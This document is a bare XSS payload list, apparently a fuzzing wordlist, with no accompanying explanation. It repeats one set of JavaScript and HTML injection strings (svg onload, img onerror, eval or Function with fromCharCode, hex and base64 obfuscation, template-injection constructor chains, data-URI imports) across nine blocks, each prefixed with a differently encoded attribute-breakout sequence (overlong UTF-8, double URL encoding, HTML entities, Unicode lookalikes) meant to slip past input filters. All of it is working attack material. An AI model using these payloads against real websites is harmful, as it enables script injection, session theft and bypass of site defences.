%F0%80%80%A2%F0%80%80%AF%F0%80%80%BEalert(1)
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BE{alert(1)}
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BEonerror=alert;throw 1
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BEnew Function`alert\`1\```
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BEFunction(String.fromCharCode(97,108,101,114,116,40,49,41))()
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BEeval(String.fromCharCode(97,108,101,114,116,40,49,41))
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BEdocument.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BEdocument.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BEimport('data:,alert(1)')
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BEsetTimeout("alert(1)")
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BElocation=javascript:alert(1)
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BE<svg/onload=alert(1)>
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BE<img src=x onerror=alert(1)>
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BE{{constructor.constructor('alert(1)')()}}
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BE$.getScript('data:,alert(1)')
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BE<a id=alert><a id=alert name=href>javascript:alert(1)
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BEtrustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BEnavigator.serviceWorker.register('data:,alert(1)')
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BEfetch('https://trusted-site.com/jsonp?callback=alert(1)//')
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BE<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BEFunction("al"+"ert(1)")()
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BEFunction("\x61\x6c\x65\x72\x74\x28\x31\x29")()
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BEeval("\x61\x6c\x65\x72\x74\x28\x31\x29")
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BEsetTimeout("alert(1)",0)
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BE<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BE<svg/onload=alert(1)>
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BElocation="javascript:alert(1)"
%F0%80%80%A2%F0%80%80%AF%F0%80%80%BEdocument.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

%22%252F%3Ealert(1)
%22%252F%3E{alert(1)}
%22%252F%3Eonerror=alert;throw 1
%22%252F%3Enew Function`alert\`1\```
%22%252F%3EFunction(String.fromCharCode(97,108,101,114,116,40,49,41))()
%22%252F%3Eeval(String.fromCharCode(97,108,101,114,116,40,49,41))
%22%252F%3Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
%22%252F%3Edocument.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
%22%252F%3Eimport('data:,alert(1)')
%22%252F%3EsetTimeout("alert(1)")
%22%252F%3Elocation=javascript:alert(1)
%22%252F%3E<svg/onload=alert(1)>
%22%252F%3E<img src=x onerror=alert(1)>
%22%252F%3E{{constructor.constructor('alert(1)')()}}
%22%252F%3E$.getScript('data:,alert(1)')
%22%252F%3E<a id=alert><a id=alert name=href>javascript:alert(1)
%22%252F%3EtrustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
%22%252F%3Enavigator.serviceWorker.register('data:,alert(1)')
%22%252F%3Efetch('https://trusted-site.com/jsonp?callback=alert(1)//')
%22%252F%3E<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
%22%252F%3EFunction("al"+"ert(1)")()
%22%252F%3EFunction("\x61\x6c\x65\x72\x74\x28\x31\x29")()
%22%252F%3Eeval("\x61\x6c\x65\x72\x74\x28\x31\x29")
%22%252F%3EsetTimeout("alert(1)",0)
%22%252F%3E<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
%22%252F%3E<svg/onload=alert(1)>
%22%252F%3Elocation="javascript:alert(1)"
%22%252F%3Edocument.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

%2522%2F%253Ealert(1)
%2522%2F%253E{alert(1)}
%2522%2F%253Eonerror=alert;throw 1
%2522%2F%253Enew Function`alert\`1\```
%2522%2F%253EFunction(String.fromCharCode(97,108,101,114,116,40,49,41))()
%2522%2F%253Eeval(String.fromCharCode(97,108,101,114,116,40,49,41))
%2522%2F%253Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
%2522%2F%253Edocument.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
%2522%2F%253Eimport('data:,alert(1)')
%2522%2F%253EsetTimeout("alert(1)")
%2522%2F%253Elocation=javascript:alert(1)
%2522%2F%253E<svg/onload=alert(1)>
%2522%2F%253E<img src=x onerror=alert(1)>
%2522%2F%253E{{constructor.constructor('alert(1)')()}}
%2522%2F%253E$.getScript('data:,alert(1)')
%2522%2F%253E<a id=alert><a id=alert name=href>javascript:alert(1)
%2522%2F%253EtrustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
%2522%2F%253Enavigator.serviceWorker.register('data:,alert(1)')
%2522%2F%253Efetch('https://trusted-site.com/jsonp?callback=alert(1)//')
%2522%2F%253E<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
%2522%2F%253EFunction("al"+"ert(1)")()
%2522%2F%253EFunction("\x61\x6c\x65\x72\x74\x28\x31\x29")()
%2522%2F%253Eeval("\x61\x6c\x65\x72\x74\x28\x31\x29")
%2522%2F%253EsetTimeout("alert(1)",0)
%2522%2F%253E<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
%2522%2F%253E<svg/onload=alert(1)>
%2522%2F%253Elocation="javascript:alert(1)"
%2522%2F%253Edocument.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

\u0022%2F\x3Ealert(1)
\u0022%2F\x3E{alert(1)}
\u0022%2F\x3Eonerror=alert;throw 1
\u0022%2F\x3Enew Function`alert\`1\```
\u0022%2F\x3EFunction(String.fromCharCode(97,108,101,114,116,40,49,41))()
\u0022%2F\x3Eeval(String.fromCharCode(97,108,101,114,116,40,49,41))
\u0022%2F\x3Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
\u0022%2F\x3Edocument.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
\u0022%2F\x3Eimport('data:,alert(1)')
\u0022%2F\x3EsetTimeout("alert(1)")
\u0022%2F\x3Elocation=javascript:alert(1)
\u0022%2F\x3E<svg/onload=alert(1)>
\u0022%2F\x3E<img src=x onerror=alert(1)>
\u0022%2F\x3E{{constructor.constructor('alert(1)')()}}
\u0022%2F\x3E$.getScript('data:,alert(1)')
\u0022%2F\x3E<a id=alert><a id=alert name=href>javascript:alert(1)
\u0022%2F\x3EtrustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
\u0022%2F\x3Enavigator.serviceWorker.register('data:,alert(1)')
\u0022%2F\x3Efetch('https://trusted-site.com/jsonp?callback=alert(1)//')
\u0022%2F\x3E<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
\u0022%2F\x3EFunction("al"+"ert(1)")()
\u0022%2F\x3EFunction("\x61\x6c\x65\x72\x74\x28\x31\x29")()
\u0022%2F\x3Eeval("\x61\x6c\x65\x72\x74\x28\x31\x29")
\u0022%2F\x3EsetTimeout("alert(1)",0)
\u0022%2F\x3E<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
\u0022%2F\x3E<svg/onload=alert(1)>
\u0022%2F\x3Elocation="javascript:alert(1)"
\u0022%2F\x3Edocument.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

&amp;#34;&#x2F;&gt;alert(1)
&amp;#34;&#x2F;&gt;{alert(1)}
&amp;#34;&#x2F;&gt;onerror=alert;throw 1
&amp;#34;&#x2F;&gt;new Function`alert\`1\```
&amp;#34;&#x2F;&gt;Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
&amp;#34;&#x2F;&gt;eval(String.fromCharCode(97,108,101,114,116,40,49,41))
&amp;#34;&#x2F;&gt;document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
&amp;#34;&#x2F;&gt;document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
&amp;#34;&#x2F;&gt;import('data:,alert(1)')
&amp;#34;&#x2F;&gt;setTimeout("alert(1)")
&amp;#34;&#x2F;&gt;location=javascript:alert(1)
&amp;#34;&#x2F;&gt;<svg/onload=alert(1)>
&amp;#34;&#x2F;&gt;<img src=x onerror=alert(1)>
&amp;#34;&#x2F;&gt;{{constructor.constructor('alert(1)')()}}
&amp;#34;&#x2F;&gt;$.getScript('data:,alert(1)')
&amp;#34;&#x2F;&gt;<a id=alert><a id=alert name=href>javascript:alert(1)
&amp;#34;&#x2F;&gt;trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
&amp;#34;&#x2F;&gt;navigator.serviceWorker.register('data:,alert(1)')
&amp;#34;&#x2F;&gt;fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
&amp;#34;&#x2F;&gt;<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
&amp;#34;&#x2F;&gt;Function("al"+"ert(1)")()
&amp;#34;&#x2F;&gt;Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
&amp;#34;&#x2F;&gt;eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
&amp;#34;&#x2F;&gt;setTimeout("alert(1)",0)
&amp;#34;&#x2F;&gt;<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
&amp;#34;&#x2F;&gt;<svg/onload=alert(1)>
&amp;#34;&#x2F;&gt;location="javascript:alert(1)"
&amp;#34;&#x2F;&gt;document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

⍮⍻⍾alert(1)
⍮⍻⍾{alert(1)}
⍮⍻⍾onerror=alert;throw 1
⍮⍻⍾new Function`alert\`1\```
⍮⍻⍾Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
⍮⍻⍾eval(String.fromCharCode(97,108,101,114,116,40,49,41))
⍮⍻⍾document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
⍮⍻⍾document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
⍮⍻⍾import('data:,alert(1)')
⍮⍻⍾setTimeout("alert(1)")
⍮⍻⍾location=javascript:alert(1)
⍮⍻⍾<svg/onload=alert(1)>
⍮⍻⍾<img src=x onerror=alert(1)>
⍮⍻⍾{{constructor.constructor('alert(1)')()}}
⍮⍻⍾$.getScript('data:,alert(1)')
⍮⍻⍾<a id=alert><a id=alert name=href>javascript:alert(1)
⍮⍻⍾trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
⍮⍻⍾navigator.serviceWorker.register('data:,alert(1)')
⍮⍻⍾fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
⍮⍻⍾<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
⍮⍻⍾Function("al"+"ert(1)")()
⍮⍻⍾Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
⍮⍻⍾eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
⍮⍻⍾setTimeout("alert(1)",0)
⍮⍻⍾<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
⍮⍻⍾<svg/onload=alert(1)>
⍮⍻⍾location="javascript:alert(1)"
⍮⍻⍾document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

⫻⫼⫽alert(1)
⫻⫼⫽{alert(1)}
⫻⫼⫽onerror=alert;throw 1
⫻⫼⫽new Function`alert\`1\```
⫻⫼⫽Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
⫻⫼⫽eval(String.fromCharCode(97,108,101,114,116,40,49,41))
⫻⫼⫽document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
⫻⫼⫽document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
⫻⫼⫽import('data:,alert(1)')
⫻⫼⫽setTimeout("alert(1)")
⫻⫼⫽location=javascript:alert(1)
⫻⫼⫽<svg/onload=alert(1)>
⫻⫼⫽<img src=x onerror=alert(1)>
⫻⫼⫽{{constructor.constructor('alert(1)')()}}
⫻⫼⫽$.getScript('data:,alert(1)')
⫻⫼⫽<a id=alert><a id=alert name=href>javascript:alert(1)
⫻⫼⫽trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
⫻⫼⫽navigator.serviceWorker.register('data:,alert(1)')
⫻⫼⫽fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
⫻⫼⫽<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
⫻⫼⫽Function("al"+"ert(1)")()
⫻⫼⫽Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
⫻⫼⫽eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
⫻⫼⫽setTimeout("alert(1)",0)
⫻⫼⫽<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
⫻⫼⫽<svg/onload=alert(1)>
⫻⫼⫽location="javascript:alert(1)"
⫻⫼⫽document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

⸮ⸯ⸽alert(1)
⸮ⸯ⸽{alert(1)}
⸮ⸯ⸽onerror=alert;throw 1
⸮ⸯ⸽new Function`alert\`1\```
⸮ⸯ⸽Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
⸮ⸯ⸽eval(String.fromCharCode(97,108,101,114,116,40,49,41))
⸮ⸯ⸽document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
⸮ⸯ⸽document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
⸮ⸯ⸽import('data:,alert(1)')
⸮ⸯ⸽setTimeout("alert(1)")
⸮ⸯ⸽location=javascript:alert(1)
⸮ⸯ⸽<svg/onload=alert(1)>
⸮ⸯ⸽<img src=x onerror=alert(1)>
⸮ⸯ⸽{{constructor.constructor('alert(1)')()}}
⸮ⸯ⸽$.getScript('data:,alert(1)')
⸮ⸯ⸽<a id=alert><a id=alert name=href>javascript:alert(1)
⸮ⸯ⸽trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
⸮ⸯ⸽navigator.serviceWorker.register('data:,alert(1)')
⸮ⸯ⸽fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
⸮ⸯ⸽<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
⸮ⸯ⸽Function("al"+"ert(1)")()
⸮ⸯ⸽Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
⸮ⸯ⸽eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
⸮ⸯ⸽setTimeout("alert(1)",0)
⸮ⸯ⸽<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
⸮ⸯ⸽<svg/onload=alert(1)>
⸮ⸯ⸽location="javascript:alert(1)"
⸮ⸯ⸽document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

〄〆〒alert(1)
〄〆〒{alert(1)}
〄〆〒onerror=alert;throw 1
〄〆〒new Function`alert\`1\```
〄〆〒Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
〄〆〒eval(String.fromCharCode(97,108,101,114,116,40,49,41))
〄〆〒document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
〄〆〒document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
〄〆〒import('data:,alert(1)')
〄〆〒setTimeout("alert(1)")
〄〆〒location=javascript:alert(1)
〄〆〒<svg/onload=alert(1)>
〄〆〒<img src=x onerror=alert(1)>
〄〆〒{{constructor.constructor('alert(1)')()}}
〄〆〒$.getScript('data:,alert(1)')
〄〆〒<a id=alert><a id=alert name=href>javascript:alert(1)
〄〆〒trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
〄〆〒navigator.serviceWorker.register('data:,alert(1)')
〄〆〒fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
〄〆〒<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
〄〆〒Function("al"+"ert(1)")()
〄〆〒Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
〄〆〒eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
〄〆〒setTimeout("alert(1)",0)
〄〆〒<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
〄〆〒<svg/onload=alert(1)>
〄〆〒location="javascript:alert(1)"
〄〆〒document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")
